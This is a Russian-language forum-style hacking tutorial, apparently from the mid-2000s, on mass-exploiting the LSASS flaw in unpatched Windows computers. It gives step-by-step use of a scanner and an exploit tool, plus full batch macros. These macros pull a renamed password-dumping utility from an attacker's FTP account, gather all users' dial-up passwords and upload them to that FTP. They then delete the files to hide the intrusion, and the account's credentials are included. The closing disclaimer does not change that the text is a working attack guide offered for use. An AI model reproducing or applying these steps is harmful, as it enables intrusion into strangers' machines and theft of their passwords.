Многие тут говорят про кахт... О кахт-кахт... Да... как же он мне помогал... Но щас куча компов уже пропатчена на него, другое дело апрельская дыра в lsass. Ещё куча компов не залатали дыры от неё.
Итак, начинаем!
Что нам понадобиться?
1. Ну для начала lsass exploit... Вот недавно вышла новая версия, которая всё значительно упрощает =) Качаем эксплоит Здесь
2. Собственно сканер дыры. Ибо в эксплоите он жутко ацтойный. Имхо лучшый - DSScan. Забираем отсюда
3. То, чем мы будем забирать пароли. Можем и трояном, но с ним будете сами геморроится. Я расскажу как иметь dialuppass`ом. Забираем здесь
4. По идее тут должен быть сервер... Но я его так нормально и не настроил =) Так что идите на суперсервак www.newmail.ru и регайте себе там мыло-ftp!
Теперь смотрим что имеем:
1. lsa.exe
2. DSScan.exe
3. dialupass.exe - переименовываем в z.exe
4. сайт ya-supermegahacker.nm.ru и пароль ya_ne_lamo
5. заливаем z.exe на ftp newmail`а.
Запускаем DSScan и видим вот это:
Hostname/IP - ваш текущий айпишник
Start IP - начало диапазона для скана
End IP - соответственно конец
Указываем диапазоны и жмём на -> рядом с указанными диапазонами. При необходимости указываем ещё диапазоны и добавляем так же.
Если у вас есть уже записанные диапазоны в формате xxx.xxx.xxx.xxx-xxx.xxx.xxx.yyy, сохранённые в тхт, то жмите Browse и указывайте из какого файла забирать.
Справа должны быть указаны диапазоны. Нажимаем кнопку плей (как на магнитофонах... в виде знака >)
Если всё, ок должно быть так как здесь:
Если все Not vulnerable , то система пропатчена и неуязвима, а вот если
vulnerable, то всё зашибись!
Жмём на это вулнерейбл правую кнопку мышки и выбираем Copy IP to clipboard.
На этом DSScan пока можно отложить.
Запускаем lsa.exe! Он значит-с вот такой:
Прежде чем что-либо делать зададим макросы, для упрощения работы:
Заполняем поля вот как здесь:
Короче должно быть 3 макроса. 1,2 и 3 соответственно.
Задержка везде - 100 мс.
Тексты макросов:
echo open ftp.newmail.ru 21>mpg
echo ya-supermegahacker.nm.ru>>mpg
echo ya_ne_lamo>>mpg
echo bin>>mpg
echo get z.exe>>mpg
echo bye>>mpg
ftp -s:mpg
Это мы скачиваем файл
del mpg
z.exe /allusers /stext %COMPUTERNAME%.txt
echo open ftp.newmail.ru 21>mpg
echo ya-supermegahacker.nm.ru>>mpg
echo ya_ne_lamo>>mpg
echo bin>>mpg
echo send %COMPUTERNAME%.txt>>mpg
echo bye>>mpg
ftp -s:mpg
Это мы создаём и отправляем пароли.
del mpg
del z.exe
del %COMPUTERNAME%.txt
а это мы убираемся за собой.
После ввода каждого не забываем нажимать кнопку Сохранить!
Терь закрываем редактор макросов. У вас в буфере должен быть IP (вы не забыли?). Жмём Вставить IP-адрес
Остальные настройки НЕ меняем. Терь 2 варианта событий.
1. Соединение с xxx.xxx.xxx.xxx ...
Невозможно соединиться с xxx.xxx.xxx.xxx :445...
//ye тут всё понятно
2. Соединение с xxx.xxx.xxx.xxx...
Определение операционной системы...
Атака... Готово!
Здесь появляется окошко:
Если оно тут же исчезло, то соединение таки заблокировали, пробуйте другой IP.
Тут вводим 1 и жмём Enter. Дожидаемся слов
bin
get z.exe
bye
X:XXXXXsystem32>
Жмём 2 и ждём слов:
bin
send IMYA_KOMPA.txt
bye
X:XXXXXsystem32>
Жмём 3 ждём слов:
X:XXXXXsystem32>del z.exe
X:XXXXXsystem32>del %COMPUTERNAME%.txt
Закрываем окно.
Всё! пассы на нашем FTP Сливаем файло к себе на комп, при возможности меняем пассы и идём бухать с радости.
П.С. При последующих подключениях макросы править не надо. Он всё запомнит
2.П.С. Данный текст написан исключительно в ознакомительных целях. Её автор не несёт АБСОЛЮТНО никакой ответственности за возможные последствия использования его в целях, запрещенных Уголовным Кодексом Российской Федерации и законами других стран. Помните, что незнание законов не освобожает от ответственности.
3.П.С. Если кто не понял как это делается, то может считать себя полным ****, ибо я даже сказал на какие кнопки тыркать!